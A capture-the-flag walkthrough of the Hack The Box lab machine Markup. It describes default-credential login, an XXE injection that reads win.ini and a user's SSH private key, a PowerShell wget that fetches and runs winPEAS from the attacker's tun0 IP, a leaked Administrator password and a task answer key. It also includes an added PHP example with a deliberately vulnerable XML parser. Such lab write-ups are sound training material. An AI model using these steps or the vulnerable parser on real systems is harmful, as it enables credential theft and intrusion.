#17 Markup - Starting Point - Hack The Box || Complete Walkthrough


Markup is a Windows machine running a misconfigured web application whose XML parser leaks the SSH private key of a user through an XML External Entity (XXE) vulnerability. The steps are covered below.


Enumeration

Click on the spawn machine to find the Target IP address.

As always, we begin by scanning the target for open ports.

┌──(mrdev㉿mrdev)-[~]
└─$ sudo nmap -sC -A -Pn 10.129.175.175 
[sudo] password for mrdev:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-29 19:20 IST
Nmap scan report for 10.129.175.175
Host is up (0.30s latency). 
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)   
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA) 
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519) 
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)  
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags:  
|   /:     
|     PHPSESSID:   
|_      httponly flag not set  
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) 
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47   
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1 
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28  
|_ssl-date: TLS randomness does not represent time  
|_http-title: MegaShopping
| http-cookie-flags:  
|   /:     
|     PHPSESSID:   
|_      httponly flag not set   
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Polycom SoundPoint IP 331 VoIP phone (98%), Android 7.1.2 (Linux 3.10) (97%), AVtech Room Alert 26W environmental monitor (97%), Avaya Office IP403 VoIP adapter (97%), NetworkAlchemy ArgentBranch PBX (97%), Avaya Office IP500 VoIP adapter (97%), OneAccess 1641 router (95%), Adtran NetVanta 1224R or 3430 router (95%), Blue Coat PacketShaper appliance (95%), CipherLab 5100 time and attendance terminal (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops 
TRACEROUTE (using port 443/tcp) 
HOP RTT       ADDRESS  
1   0.86 ms   mrdev.mshome.net (172.19.0.1)
2   291.97 ms 10.10.14.1  
3   369.86 ms 10.129.175.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 77.93 seconds   
┌──(mrdev㉿mrdev)-[~] 
└─$  

Let's navigate to the webpage using the Mozilla Firefox browser:

The webpage features the landing page for an online shopping company. A login screen is presented to us.

A username and password are requested. Let's try some common default credentials for the MegaShopping login, such as:

admin: admin
administrator: administrator
admin: administrator
admin: password

After trying these manually, we land on a successful login. The correct combination is admin:password.

We are presented with the customer store panel.


Foothold

The website has some basic functionality that allows you to place orders.

Start Burp suite, and capture the request:

If we capture the request and inspect it in Burp, we can see that the order data is sent to the server in XML format. Let's check whether an XXE (XML External Entity) vulnerability exists.


XML external entity (XXE) injection

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

We can perform an XML External Entity (XXE) injection to retrieve the contents of the win.ini file by declaring an external entity that points at it and referencing that entity inside the order data.


Send the request to Repeater using Ctrl + R and submit the modified XML. The response contains the contents of win.ini, which confirms that the web server is vulnerable to XXE.
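As an added illustration of the bug itself (this is not code from the box or from the walkthrough), the snippet below shows a minimal PHP order handler parsed the way a vulnerable PHP 7.2 application might, beside a hardened version. The function names and the <order> layout are assumptions; the sample body is constructed.

```php
<?php
// Added example, not the MegaShopping application's code. Names assumed.

// Constructed request body in the shape the walkthrough describes: an order
// whose DOCTYPE declares an external entity pointing at a local file.
$body = <<<XML
<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]>
<order><quantity>1</quantity><item>&xxe;</item><address>x</address></order>
XML;

// VULNERABLE: LIBXML_NOENT makes libxml2 substitute entities, so the parser
// reads the SYSTEM entity's file and its contents land in the <item> value,
// which the application then echoes back to the client.
function parseOrderVulnerable(string $xml): string {
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    return (string) $doc->item;
}

// HARDENED: reject any document carrying a DOCTYPE (a plain order never
// needs one), never pass LIBXML_NOENT, forbid network access during the
// parse, and switch the external entity loader off for the duration.
// libxml_disable_entity_loader() is deprecated in PHP 8, where the loader is
// already off by default, but on the 7.2 build seen in the nmap output it
// is the effective switch.
function parseOrderHardened(string $xml): string {
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new InvalidArgumentException('DOCTYPE is not allowed in order XML');
    }
    $prev = libxml_disable_entity_loader(true);
    libxml_use_internal_errors(true);
    try {
        $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
        if ($doc === false) {
            throw new InvalidArgumentException('Malformed order XML');
        }
        return (string) $doc->item;
    } finally {
        libxml_disable_entity_loader($prev);
    }
}

echo "vulnerable: " . parseOrderVulnerable($body) . PHP_EOL; // echoes win.ini
try {
    echo "hardened: " . parseOrderHardened($body) . PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected (" . $e->getMessage() . ")" . PHP_EOL;
}
```

The same DOCTYPE check is also a practical detection rule: legitimate order submissions never carry an entity declaration, so any request body containing <!DOCTYPE or <!ENTITY is worth logging and alerting on.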

From the Nmap scan we know that an SSH server is listening on port 22 of this Windows host. If we can find a username, we can probably read that user's SSH key with the same XXE. The source code of the web page mentions the user daniel.

So change the entity in the request to point at the path where the key is stored. On Windows, OpenSSH private keys are usually stored at C:\Users\username\.ssh\id_rsa.

The response contains an OpenSSH private key. I copied the key into a file called id_rsa using the nano text editor and restricted its permissions.

┌──(mrdev㉿mrdev)-[~]  
└─$ sudo nano id_rsa
┌──(mrdev㉿mrdev)-[~]  
└─$ sudo chmod 400 id_rsa

So next we try to SSH to the server with daniel's key.

┌──(mrdev㉿mrdev)-[~]  
└─$ ssh -i id_rsa daniel@10.129.175.175
Microsoft Windows [Version 10.0.17763.107] 
(c) 2018 Microsoft Corporation. All rights reserved.
daniel@MARKUP C:\Users\daniel>

You can find out the user flag from the desktop:

Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.  
daniel@MARKUP C:\Users\daniel> cd Desktop        
daniel@MARKUP C:\Users\daniel\Desktop> type user.txt   
0***********************7 
daniel@MARKUP C:\Users\daniel\Desktop> 


Privilege Escalation

Escalating privileges is quite easy: you just need to upload the winPEAS.exe file to the desktop and execute it, and it will reveal the Administrator username and password. Let's see how it works.


Windows Privilege Escalation using WinPEAS

Beforehand, I placed a copy of winPEASx64.exe in c:\xampp\htdocs on my XAMPP installation and started the Apache server so the file could be served over HTTP.

Switch back to the SSH shell, start PowerShell, and then download winPEASx64.exe using wget (the PowerShell alias for Invoke-WebRequest).

daniel@MARKUP C:\Users\daniel\Desktop> powershell
Windows PowerShell    
Copyright (C) Microsoft Corporation. All rights reserved. 
PS C:\Users\daniel\Desktop> wget http://{OpenVPN IP(tun0)}/winPEASx64.exe -outfile winPEASx64.exe

Execute the winPEASx64.exe :

PS C:\Users\daniel\Desktop> .\winPEASx64.exe

Analyse the output and you can find the Administrator's password.

We have now an Administrator username and password, so let’s connect with SSH.

┌──(mrdev㉿mrdev)-[~]  
└─$ ssh administrator@10.129.175.175
administrator@10.129.175.175's password: Yhk}QE&j<3M

You can find out the root flag from the desktop:

Microsoft Windows [Version 10.0.17763.107] 
(c) 2018 Microsoft Corporation. All rights reserved.
administrator@MARKUP C:\Users\Administrator> cd Desktop

administrator@MARKUP C:\Users\Administrator\Desktop> type root.txt
f******************************8

administrator@MARKUP C:\Users\Administrator\Desktop>


Task Solutions


TASK 1: What version of Apache is running on the target's port 80?

Ans. 2.4.41

TASK 2: What username:password combination logs in successfully?

Ans. admin:password

TASK 3: What is the word at the top of the page that accepts user input?

Ans. order

TASK 4: What XML version is used on the target?

Ans. 1.0

TASK 5: What does the XXE / XEE attack acronym stand for?

Ans. XML External Entity

TASK 6: What username can we find on the webpage's HTML code?

Ans. Daniel

TASK 7: What is the file located in the Log-Management folder on the target?

Ans. job.bat

TASK 8: What executable is mentioned in the file mentioned before?

Ans. wevtutil.exe
